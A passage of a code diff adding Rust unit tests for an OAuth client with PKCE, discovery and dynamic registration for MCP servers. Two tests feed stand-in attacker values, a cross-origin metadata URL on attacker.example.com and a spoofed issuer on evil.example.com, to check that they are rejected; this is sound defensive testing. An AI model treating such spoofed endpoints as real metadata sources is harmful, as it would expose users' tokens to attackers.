+                c.is_ascii_alphanumeric() || c == '-' || c == '_',
+                "invalid base64url character: {}",
+                c
+            );
+        }
+    }
+
+    #[test]
+    fn test_pkce_challenge_is_s256_of_verifier() {
+        // challenge == base64url(SHA-256(verifier)) — the S256 code challenge
+        // method, recomputed here independently.
+        let pkce = generate_pkce_challenge();
+        let engine = base64::engine::general_purpose::URL_SAFE_NO_PAD;
+        let expected_digest = Sha256::digest(pkce.verifier.as_bytes());
+        let expected_challenge = engine.encode(expected_digest);
+        assert_eq!(pkce.challenge, expected_challenge);
+    }
+
+    #[test]
+    fn test_pkce_challenges_are_unique() {
+        let a = generate_pkce_challenge();
+        let b = generate_pkce_challenge();
+        assert_ne!(a.verifier, b.verifier);
+    }
+
+    // -- Authorization URL tests ---------------------------------------------
+    // build_authorization_url must emit all required query parameters
+    // (response_type, client_id, redirect_uri, resource, PKCE pair, state)
+    // and omit `scope` entirely when no scopes were selected.
+
+    #[test]
+    fn test_build_authorization_url() {
+        let metadata = AuthServerMetadata {
+            issuer: Url::parse("https://auth.example.com").unwrap(),
+            authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+            token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+            registration_endpoint: None,
+            scopes_supported: None,
+            code_challenge_methods_supported: Some(vec!["S256".into()]),
+            client_id_metadata_document_supported: true,
+        };
+        let pkce = PkceChallenge {
+            verifier: "test_verifier".into(),
+            challenge: "test_challenge".into(),
+        };
+        let url = build_authorization_url(
+            &metadata,
+            "https://zed.dev/oauth/client-metadata.json",
+            "http://127.0.0.1:12345/callback",
+            &["files:read".into(), "files:write".into()],
+            "https://mcp.example.com",
+            &pkce,
+            "random_state_123",
+        );
+
+        let pairs: std::collections::HashMap<_, _> = url.query_pairs().collect();
+        assert_eq!(pairs.get("response_type").unwrap(), "code");
+        assert_eq!(
+            pairs.get("client_id").unwrap(),
+            "https://zed.dev/oauth/client-metadata.json"
+        );
+        assert_eq!(
+            pairs.get("redirect_uri").unwrap(),
+            "http://127.0.0.1:12345/callback"
+        );
+        // Multiple scopes are joined with a single space.
+        assert_eq!(pairs.get("scope").unwrap(), "files:read files:write");
+        assert_eq!(pairs.get("resource").unwrap(), "https://mcp.example.com");
+        // Only the challenge (never the verifier) appears in the URL.
+        assert_eq!(pairs.get("code_challenge").unwrap(), "test_challenge");
+        assert_eq!(pairs.get("code_challenge_method").unwrap(), "S256");
+        assert_eq!(pairs.get("state").unwrap(), "random_state_123");
+    }
+
+    #[test]
+    fn test_build_authorization_url_omits_empty_scope() {
+        let metadata = AuthServerMetadata {
+            issuer: Url::parse("https://auth.example.com").unwrap(),
+            authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+            token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+            registration_endpoint: None,
+            scopes_supported: None,
+            code_challenge_methods_supported: Some(vec!["S256".into()]),
+            client_id_metadata_document_supported: false,
+        };
+        let pkce = PkceChallenge {
+            verifier: "v".into(),
+            challenge: "c".into(),
+        };
+        let url = build_authorization_url(
+            &metadata,
+            "client_123",
+            "http://127.0.0.1:9999/callback",
+            &[],
+            "https://mcp.example.com",
+            &pkce,
+            "state",
+        );
+
+        let pairs: std::collections::HashMap<_, _> = url.query_pairs().collect();
+        // An empty scope list means no `scope` parameter at all (not `scope=`).
+        assert!(!pairs.contains_key("scope"));
+    }
+
+    // -- Token exchange / refresh param tests --------------------------------
+    // The token endpoint form bodies: authorization_code exchange carries the
+    // code, redirect_uri, and PKCE verifier; refresh carries the refresh
+    // token. Both include client_id and the resource indicator.
+
+    #[test]
+    fn test_token_exchange_params() {
+        let params = token_exchange_params(
+            "auth_code_abc",
+            "client_xyz",
+            "http://127.0.0.1:5555/callback",
+            "verifier_123",
+            "https://mcp.example.com",
+        );
+        let map: std::collections::HashMap<&str, &str> =
+            params.iter().map(|(k, v)| (*k, v.as_str())).collect();
+
+        assert_eq!(map["grant_type"], "authorization_code");
+        assert_eq!(map["code"], "auth_code_abc");
+        assert_eq!(map["redirect_uri"], "http://127.0.0.1:5555/callback");
+        assert_eq!(map["client_id"], "client_xyz");
+        assert_eq!(map["code_verifier"], "verifier_123");
+        assert_eq!(map["resource"], "https://mcp.example.com");
+    }
+
+    #[test]
+    fn test_token_refresh_params() {
+        let params =
+            token_refresh_params("refresh_token_abc", "client_xyz", "https://mcp.example.com");
+        let map: std::collections::HashMap<&str, &str> =
+            params.iter().map(|(k, v)| (*k, v.as_str())).collect();
+
+        assert_eq!(map["grant_type"], "refresh_token");
+        assert_eq!(map["refresh_token"], "refresh_token_abc");
+        assert_eq!(map["client_id"], "client_xyz");
+        assert_eq!(map["resource"], "https://mcp.example.com");
+    }
+
+    // -- Token response tests ------------------------------------------------
+    // TokenResponse::into_tokens converts a relative `expires_in` (seconds)
+    // into an absolute `expires_at`; refresh_token and expiry are optional.
+
+    #[test]
+    fn test_token_response_into_tokens_with_expiry() {
+        let response: TokenResponse = serde_json::from_str(
+            r#"{"access_token": "at_123", "refresh_token": "rt_456", "expires_in": 3600, "token_type": "Bearer"}"#,
+        )
+        .unwrap();
+
+        let tokens = response.into_tokens();
+        assert_eq!(tokens.access_token, "at_123");
+        assert_eq!(tokens.refresh_token.as_deref(), Some("rt_456"));
+        // expires_in was present, so an absolute deadline must be computed.
+        assert!(tokens.expires_at.is_some());
+    }
+
+    #[test]
+    fn test_token_response_into_tokens_minimal() {
+        // Only access_token is mandatory; everything else defaults to None.
+        let response: TokenResponse =
+            serde_json::from_str(r#"{"access_token": "at_789"}"#).unwrap();
+
+        let tokens = response.into_tokens();
+        assert_eq!(tokens.access_token, "at_789");
+        assert_eq!(tokens.refresh_token, None);
+        assert_eq!(tokens.expires_at, None);
+    }
+
+    // -- DCR body test -------------------------------------------------------
+
+    #[test]
+    fn test_dcr_registration_body_shape() {
+        // The dynamic-registration request is a public client ("none" token
+        // endpoint auth) doing the authorization-code flow with one redirect.
+        let body = dcr_registration_body("http://127.0.0.1:12345/callback");
+        assert_eq!(body["client_name"], "Zed");
+        assert_eq!(body["redirect_uris"][0], "http://127.0.0.1:12345/callback");
+        assert_eq!(body["grant_types"][0], "authorization_code");
+        assert_eq!(body["response_types"][0], "code");
+        assert_eq!(body["token_endpoint_auth_method"], "none");
+    }
+
+    // -- Test helpers for async/HTTP tests -----------------------------------
+
+    // Wraps a per-request handler closure in a FakeHttpClient, erased to the
+    // Arc<dyn HttpClient> the code under test expects. The handler receives
+    // each outgoing request and returns a boxed future of the fake response.
+    fn make_fake_http_client(
+        handler: impl Fn(
+            http_client::Request<AsyncBody>,
+        ) -> std::pin::Pin<
+            Box<dyn std::future::Future<Output = anyhow::Result<Response<AsyncBody>>> + Send>,
+        > + Send
+        + Sync
+        + 'static,
+    ) -> Arc<dyn HttpClient> {
+        http_client::FakeHttpClient::create(handler) as Arc<dyn HttpClient>
+    }
+
+    // Builds a canned JSON response with the given status code and body text.
+    fn json_response(status: u16, body: &str) -> anyhow::Result<Response<AsyncBody>> {
+        Ok(Response::builder()
+            .status(status)
+            .header("Content-Type", "application/json")
+            .body(AsyncBody::from(body.as_bytes().to_vec()))
+            .unwrap())
+    }
+
+    // -- Discovery integration tests -----------------------------------------
+    // These drive fetch_protected_resource_metadata against a fake HTTP
+    // client: well-known fallback, preference for the challenge-supplied
+    // metadata URL, and rejection of cross-origin metadata URLs.
+
+    #[test]
+    fn test_fetch_protected_resource_metadata() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains(".well-known/oauth-protected-resource") {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"],
+                                "scopes_supported": ["read", "write"]
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            // No resource_metadata in the challenge ⇒ well-known URL is used.
+            let www_auth = WwwAuthenticate {
+                resource_metadata: None,
+                scope: None,
+                error: None,
+                error_description: None,
+            };
+
+            let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+                .await
+                .unwrap();
+
+            // Note: Url normalizes a bare origin with a trailing slash.
+            assert_eq!(metadata.resource.as_str(), "https://mcp.example.com/");
+            assert_eq!(metadata.authorization_servers.len(), 1);
+            assert_eq!(
+                metadata.authorization_servers[0].as_str(),
+                "https://auth.example.com/"
+            );
+            assert_eq!(
+                metadata.scopes_supported,
+                Some(vec!["read".to_string(), "write".to_string()])
+            );
+        });
+    }
+
+    #[test]
+    fn test_fetch_protected_resource_metadata_prefers_www_authenticate_url() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    // Only the challenge-supplied URL may be fetched; any
+                    // other request is answered with an error so the test
+                    // fails if the fallback is tried first.
+                    if uri == "https://mcp.example.com/custom-resource-metadata" {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"]
+                            }"#,
+                        )
+                    } else {
+                        json_response(500, r#"{"error": "should not be called"}"#)
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            let www_auth = WwwAuthenticate {
+                resource_metadata: Some(
+                    Url::parse("https://mcp.example.com/custom-resource-metadata").unwrap(),
+                ),
+                scope: None,
+                error: None,
+                error_description: None,
+            };
+
+            let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+                .await
+                .unwrap();
+
+            assert_eq!(metadata.authorization_servers.len(), 1);
+        });
+    }
+
+    #[test]
+    fn test_fetch_protected_resource_metadata_rejects_cross_origin_url() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    // The cross-origin URL should NOT be fetched; only the
+                    // well-known fallback at the server's own origin should be.
+                    if uri.contains("attacker.example.com") {
+                        panic!("should not fetch cross-origin resource_metadata URL");
+                    } else if uri.contains(".well-known/oauth-protected-resource") {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"]
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            let www_auth = WwwAuthenticate {
+                resource_metadata: Some(
+                    Url::parse("https://attacker.example.com/fake-metadata").unwrap(),
+                ),
+                scope: None,
+                error: None,
+                error_description: None,
+            };
+
+            let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+                .await
+                .unwrap();
+
+            // Should have used the fallback well-known URL, not the attacker's.
+            assert_eq!(metadata.resource.as_str(), "https://mcp.example.com/");
+        });
+    }
+
+    // fetch_auth_server_metadata: OAuth metadata endpoint is tried first,
+    // falling back to OIDC discovery; a response whose `issuer` differs from
+    // the one we asked about must be rejected.
+    #[test]
+    fn test_fetch_auth_server_metadata() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains(".well-known/oauth-authorization-server") {
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://auth.example.com",
+                                "authorization_endpoint": "https://auth.example.com/authorize",
+                                "token_endpoint": "https://auth.example.com/token",
+                                "registration_endpoint": "https://auth.example.com/register",
+                                "code_challenge_methods_supported": ["S256"],
+                                "client_id_metadata_document_supported": true
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let issuer = Url::parse("https://auth.example.com").unwrap();
+            let metadata = fetch_auth_server_metadata(&client, &issuer).await.unwrap();
+
+            assert_eq!(metadata.issuer.as_str(), "https://auth.example.com/");
+            assert_eq!(
+                metadata.authorization_endpoint.as_str(),
+                "https://auth.example.com/authorize"
+            );
+            assert_eq!(
+                metadata.token_endpoint.as_str(),
+                "https://auth.example.com/token"
+            );
+            assert!(metadata.registration_endpoint.is_some());
+            assert!(metadata.client_id_metadata_document_supported);
+            assert_eq!(
+                metadata.code_challenge_methods_supported,
+                Some(vec!["S256".to_string()])
+            );
+        });
+    }
+
+    #[test]
+    fn test_fetch_auth_server_metadata_falls_back_to_oidc() {
+        smol::block_on(async {
+            // Only the OIDC discovery document exists; the OAuth metadata
+            // endpoint 404s, exercising the fallback path.
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("openid-configuration") {
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://auth.example.com",
+                                "authorization_endpoint": "https://auth.example.com/authorize",
+                                "token_endpoint": "https://auth.example.com/token",
+                                "code_challenge_methods_supported": ["S256"]
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let issuer = Url::parse("https://auth.example.com").unwrap();
+            let metadata = fetch_auth_server_metadata(&client, &issuer).await.unwrap();
+
+            assert_eq!(
+                metadata.authorization_endpoint.as_str(),
+                "https://auth.example.com/authorize"
+            );
+            // Field absent from the document ⇒ defaults to false.
+            assert!(!metadata.client_id_metadata_document_supported);
+        });
+    }
+
+    #[test]
+    fn test_fetch_auth_server_metadata_rejects_issuer_mismatch() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains(".well-known/oauth-authorization-server") {
+                        // Response claims to be a different issuer.
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://evil.example.com",
+                                "authorization_endpoint": "https://evil.example.com/authorize",
+                                "token_endpoint": "https://evil.example.com/token",
+                                "code_challenge_methods_supported": ["S256"]
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let issuer = Url::parse("https://auth.example.com").unwrap();
+            let result = fetch_auth_server_metadata(&client, &issuer).await;
+
+            assert!(result.is_err());
+            let err_msg = result.unwrap_err().to_string();
+            assert!(
+                err_msg.contains("issuer mismatch"),
+                "unexpected error: {}",
+                err_msg
+            );
+        });
+    }
+
+    // -- Full discover integration tests -------------------------------------
+    // End-to-end discovery: resource metadata → auth server metadata → client
+    // registration. Covers the CIMD path, the DCR fallback, and the hard
+    // failure when the server does not advertise PKCE support.
+
+    #[test]
+    fn test_full_discover_with_cimd() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("oauth-protected-resource") {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"],
+                                "scopes_supported": ["mcp:read"]
+                            }"#,
+                        )
+                    } else if uri.contains("oauth-authorization-server") {
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://auth.example.com",
+                                "authorization_endpoint": "https://auth.example.com/authorize",
+                                "token_endpoint": "https://auth.example.com/token",
+                                "code_challenge_methods_supported": ["S256"],
+                                "client_id_metadata_document_supported": true
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            let www_auth = WwwAuthenticate {
+                resource_metadata: None,
+                scope: None,
+                error: None,
+                error_description: None,
+            };
+
+            let discovery = discover(&client, &server_url, &www_auth).await.unwrap();
+            let registration =
+                resolve_client_registration(&client, &discovery, "http://127.0.0.1:12345/callback")
+                    .await
+                    .unwrap();
+
+            // CIMD: the client_id is our hosted metadata URL; no secret issued.
+            assert_eq!(registration.client_id, CIMD_URL);
+            assert_eq!(registration.client_secret, None);
+            assert_eq!(discovery.scopes, vec!["mcp:read"]);
+        });
+    }
+
+    #[test]
+    fn test_full_discover_with_dcr_fallback() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("oauth-protected-resource") {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"]
+                            }"#,
+                        )
+                    } else if uri.contains("oauth-authorization-server") {
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://auth.example.com",
+                                "authorization_endpoint": "https://auth.example.com/authorize",
+                                "token_endpoint": "https://auth.example.com/token",
+                                "registration_endpoint": "https://auth.example.com/register",
+                                "code_challenge_methods_supported": ["S256"],
+                                "client_id_metadata_document_supported": false
+                            }"#,
+                        )
+                    } else if uri.contains("/register") {
+                        json_response(
+                            201,
+                            r#"{
+                                "client_id": "dcr-minted-id-123",
+                                "client_secret": "dcr-secret-456"
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            let www_auth = WwwAuthenticate {
+                resource_metadata: None,
+                scope: Some(vec!["files:read".into()]),
+                error: None,
+                error_description: None,
+            };
+
+            let discovery = discover(&client, &server_url, &www_auth).await.unwrap();
+            let registration =
+                resolve_client_registration(&client, &discovery, "http://127.0.0.1:9999/callback")
+                    .await
+                    .unwrap();
+
+            // DCR: credentials come from the registration endpoint's response.
+            assert_eq!(registration.client_id, "dcr-minted-id-123");
+            assert_eq!(
+                registration.client_secret.as_deref(),
+                Some("dcr-secret-456")
+            );
+            assert_eq!(discovery.scopes, vec!["files:read"]);
+        });
+    }
+
+    #[test]
+    fn test_discover_fails_without_pkce_support() {
+        smol::block_on(async {
+            // Auth server metadata omits code_challenge_methods_supported,
+            // so discovery must refuse to proceed.
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("oauth-protected-resource") {
+                        json_response(
+                            200,
+                            r#"{
+                                "resource": "https://mcp.example.com",
+                                "authorization_servers": ["https://auth.example.com"]
+                            }"#,
+                        )
+                    } else if uri.contains("oauth-authorization-server") {
+                        json_response(
+                            200,
+                            r#"{
+                                "issuer": "https://auth.example.com",
+                                "authorization_endpoint": "https://auth.example.com/authorize",
+                                "token_endpoint": "https://auth.example.com/token"
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let server_url = Url::parse("https://mcp.example.com").unwrap();
+            let www_auth = WwwAuthenticate {
+                resource_metadata: None,
+                scope: None,
+                error: None,
+                error_description: None,
+            };
+
+            let result = discover(&client, &server_url, &www_auth).await;
+            assert!(result.is_err());
+            let err_msg = result.unwrap_err().to_string();
+            assert!(
+                err_msg.contains("code_challenge_methods_supported"),
+                "unexpected error: {}",
+                err_msg
+            );
+        });
+    }
+
+    // -- Token exchange integration tests ------------------------------------
+    // exchange_code and refresh_tokens against a fake token endpoint:
+    // successful exchange, successful refresh, and HTTP-error propagation.
+
+    #[test]
+    fn test_exchange_code_success() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("/token") {
+                        json_response(
+                            200,
+                            r#"{
+                                "access_token": "new_access_token",
+                                "refresh_token": "new_refresh_token",
+                                "expires_in": 3600,
+                                "token_type": "Bearer"
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let metadata = AuthServerMetadata {
+                issuer: Url::parse("https://auth.example.com").unwrap(),
+                authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+                token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+                registration_endpoint: None,
+                scopes_supported: None,
+                code_challenge_methods_supported: Some(vec!["S256".into()]),
+                client_id_metadata_document_supported: true,
+            };
+
+            let tokens = exchange_code(
+                &client,
+                &metadata,
+                "auth_code_123",
+                CIMD_URL,
+                "http://127.0.0.1:9999/callback",
+                "verifier_abc",
+                "https://mcp.example.com",
+            )
+            .await
+            .unwrap();
+
+            assert_eq!(tokens.access_token, "new_access_token");
+            assert_eq!(tokens.refresh_token.as_deref(), Some("new_refresh_token"));
+            assert!(tokens.expires_at.is_some());
+        });
+    }
+
+    #[test]
+    fn test_refresh_tokens_success() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|req| {
+                Box::pin(async move {
+                    let uri = req.uri().to_string();
+                    if uri.contains("/token") {
+                        json_response(
+                            200,
+                            r#"{
+                                "access_token": "refreshed_token",
+                                "expires_in": 1800,
+                                "token_type": "Bearer"
+                            }"#,
+                        )
+                    } else {
+                        json_response(404, "{}")
+                    }
+                })
+            });
+
+            let token_endpoint = Url::parse("https://auth.example.com/token").unwrap();
+
+            let tokens = refresh_tokens(
+                &client,
+                &token_endpoint,
+                "old_refresh_token",
+                CIMD_URL,
+                "https://mcp.example.com",
+            )
+            .await
+            .unwrap();
+
+            assert_eq!(tokens.access_token, "refreshed_token");
+            // Server did not rotate the refresh token; none is returned.
+            assert_eq!(tokens.refresh_token, None);
+            assert!(tokens.expires_at.is_some());
+        });
+    }
+
+    #[test]
+    fn test_exchange_code_failure() {
+        smol::block_on(async {
+            let client = make_fake_http_client(|_req| {
+                Box::pin(async move { json_response(400, r#"{"error": "invalid_grant"}"#) })
+            });
+
+            let metadata = AuthServerMetadata {
+                issuer: Url::parse("https://auth.example.com").unwrap(),
+                authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+                token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+                registration_endpoint: None,
+                scopes_supported: None,
+                code_challenge_methods_supported: Some(vec!["S256".into()]),
+                client_id_metadata_document_supported: true,
+            };
+
+            let result = exchange_code(
+                &client,
+                &metadata,
+                "bad_code",
+                "client",
+                "http://127.0.0.1:1/callback",
+                "verifier",
+                "https://mcp.example.com",
+            )
+            .await;
+
+            assert!(result.is_err());
+            // The HTTP status code must surface in the error message.
+            assert!(result.unwrap_err().to_string().contains("400"));
+        });
+    }
+
+ // -- DCR integration tests -----------------------------------------------
+
+ #[test]
+ fn test_perform_dcr() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async move {
+ json_response(
+ 201,
+ r#"{
+ "client_id": "dynamic-client-001",
+ "client_secret": "dynamic-secret-001"
+ }"#,
+ )
+ })
+ });
+
+ let endpoint = Url::parse("https://auth.example.com/register").unwrap();
+ let registration = perform_dcr(&client, &endpoint, "http://127.0.0.1:9999/callback")
+ .await
+ .unwrap();
+
+ assert_eq!(registration.client_id, "dynamic-client-001");
+ assert_eq!(
+ registration.client_secret.as_deref(),
+ Some("dynamic-secret-001")
+ );
+ });
+ }
+
+ #[test]
+ fn test_perform_dcr_failure() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(
+ async move { json_response(403, r#"{"error": "registration_not_allowed"}"#) },
+ )
+ });
+
+ let endpoint = Url::parse("https://auth.example.com/register").unwrap();
+ let result = perform_dcr(&client, &endpoint, "http://127.0.0.1:9999/callback").await;
+
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("403"));
+ });
+ }
+
+ // -- OAuthCallback parse tests -------------------------------------------
+
+ #[test]
+ fn test_oauth_callback_parse_query() {
+ let callback = OAuthCallback::parse_query("code=test_auth_code&state=test_state").unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_reversed_order() {
+ let callback = OAuthCallback::parse_query("state=test_state&code=test_auth_code").unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_with_extra_params() {
+ let callback =
+ OAuthCallback::parse_query("code=test_auth_code&state=test_state&extra=ignored")
+ .unwrap();
+ assert_eq!(callback.code, "test_auth_code");
+ assert_eq!(callback.state, "test_state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_missing_code() {
+ let result = OAuthCallback::parse_query("state=test_state");
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("code"));
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_missing_state() {
+ let result = OAuthCallback::parse_query("code=test_auth_code");
+ assert!(result.is_err());
+ assert!(result.unwrap_err().to_string().contains("state"));
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_empty_code() {
+ let result = OAuthCallback::parse_query("code=&state=test_state");
+ assert!(result.is_err());
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_empty_state() {
+ let result = OAuthCallback::parse_query("code=test_auth_code&state=");
+ assert!(result.is_err());
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_url_encoded_values() {
+ let callback = OAuthCallback::parse_query("code=abc%20def&state=test%3Dstate").unwrap();
+ assert_eq!(callback.code, "abc def");
+ assert_eq!(callback.state, "test=state");
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_error_response() {
+ let result = OAuthCallback::parse_query(
+ "error=access_denied&error_description=User%20denied%20access&state=abc",
+ );
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("access_denied"),
+ "unexpected error: {}",
+ err_msg
+ );
+ assert!(
+ err_msg.contains("User denied access"),
+ "unexpected error: {}",
+ err_msg
+ );
+ }
+
+ #[test]
+ fn test_oauth_callback_parse_query_error_without_description() {
+ let result = OAuthCallback::parse_query("error=server_error&state=abc");
+ assert!(result.is_err());
+ let err_msg = result.unwrap_err().to_string();
+ assert!(
+ err_msg.contains("server_error"),
+ "unexpected error: {}",
+ err_msg
+ );
+ assert!(
+ err_msg.contains("no description"),
+ "unexpected error: {}",
+ err_msg
+ );
+ }
+
+ // -- McpOAuthTokenProvider tests -----------------------------------------
+
+ fn make_test_session(
+ access_token: &str,
+ refresh_token: Option<&str>,
+ expires_at: Option<SystemTime>,
+ ) -> OAuthSession {
+ OAuthSession {
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ resource: Url::parse("https://mcp.example.com").unwrap(),
+ client_registration: OAuthClientRegistration {
+ client_id: "test-client".into(),
+ client_secret: None,
+ },
+ tokens: OAuthTokens {
+ access_token: access_token.into(),
+ refresh_token: refresh_token.map(String::from),
+ expires_at,
+ },
+ }
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_none_when_token_expired() {
+ let expired = SystemTime::now() - Duration::from_secs(60);
+ let session = make_test_session("stale-token", Some("rt"), Some(expired));
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token(), None);
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_token_when_not_expired() {
+ let far_future = SystemTime::now() + Duration::from_secs(3600);
+ let session = make_test_session("valid-token", Some("rt"), Some(far_future));
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token().as_deref(), Some("valid-token"));
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_returns_token_when_no_expiry() {
+ let session = make_test_session("no-expiry-token", Some("rt"), None);
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| Box::pin(async { unreachable!() })),
+ None,
+ );
+
+ assert_eq!(provider.access_token().as_deref(), Some("no-expiry-token"));
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_without_refresh_token_returns_false() {
+ smol::block_on(async {
+ let session = make_test_session("token", None, None);
+ let provider = McpOAuthTokenProvider::new(
+ session,
+ make_fake_http_client(|_| {
+ Box::pin(async { unreachable!("no HTTP call expected") })
+ }),
+ None,
+ );
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(!refreshed);
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_updates_session_and_notifies_channel() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("my-refresh-token"), None);
+ let (tx, mut rx) = futures::channel::mpsc::unbounded();
+
+ let http_client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "new-access",
+ "refresh_token": "new-refresh",
+ "expires_in": 1800
+ }"#,
+ )
+ })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, Some(tx));
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(refreshed);
+ assert_eq!(provider.access_token().as_deref(), Some("new-access"));
+
+ let notified_session = rx
+ .try_next()
+ .unwrap()
+ .expect("channel should have a session");
+ assert_eq!(notified_session.tokens.access_token, "new-access");
+ assert_eq!(
+ notified_session.tokens.refresh_token.as_deref(),
+ Some("new-refresh")
+ );
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_preserves_old_refresh_token_when_server_omits_it() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("original-refresh"), None);
+ let (tx, mut rx) = futures::channel::mpsc::unbounded();
+
+ let http_client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ json_response(
+ 200,
+ r#"{
+ "access_token": "new-access",
+ "expires_in": 900
+ }"#,
+ )
+ })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, Some(tx));
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(refreshed);
+
+ let notified_session = rx
+ .try_next()
+ .unwrap()
+ .expect("channel should have a session");
+ assert_eq!(notified_session.tokens.access_token, "new-access");
+ assert_eq!(
+ notified_session.tokens.refresh_token.as_deref(),
+ Some("original-refresh"),
+ );
+ });
+ }
+
+ #[test]
+ fn test_mcp_oauth_provider_refresh_returns_false_on_http_error() {
+ smol::block_on(async {
+ let session = make_test_session("old-access", Some("my-refresh"), None);
+
+ let http_client = make_fake_http_client(|_req| {
